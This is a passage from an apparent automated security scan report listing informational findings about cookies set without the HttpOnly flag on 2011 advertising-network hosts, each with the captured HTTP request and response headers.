Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Mon, 05-Dec-2011 11:51:52 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


10.10. http://ad.agkn.com/iframe!t=1129!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Tue, 06 Sep 2011 12:45:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

10.11. http://ad.agkn.com/iframe!t=1131!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:44:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 721
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

10.12. http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: c_34=2:68:103:4:147948:55175:1315313317:L; expires=Fri, 07-Oct-2011 12:48:37 GMT; path=/
Location: https://us.etrade.com/e/t/jumppage/viewjumppage?PageName=top_bullish_stocks&SC=S047401&o_id=60DAY+500&symbol=&ch_id=d&s_id=yhoo&c_id=BLLST
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


10.13. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:1206:131:0:55175:1315313297:L|46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L; i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; c_34=2:68:103:4:147948:55175:1315313317:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: c_1=46:1542:1206:131:1736690:55175:1315313319:L; expires=Fri, 07-Oct-2011 12:48:39 GMT; path=/
Location: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0


10.14. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1471

   function wsod_image104() {
       document.write('<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEz
...[SNIP]...

10.15. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1182

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpAR
...[SNIP]...

10.16. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:103:4:0:55175:1315313297:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:17 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1284

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpj
...[SNIP]...

10.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.3746751663275063?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=otrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1027

   function wsod_image1542() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15nir1qgd/M=791401.14796848.14552986.4227981/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.
...[SNIP]...

10.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?yhdata=ycg=&yyob=&zip=,&ybt=&&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
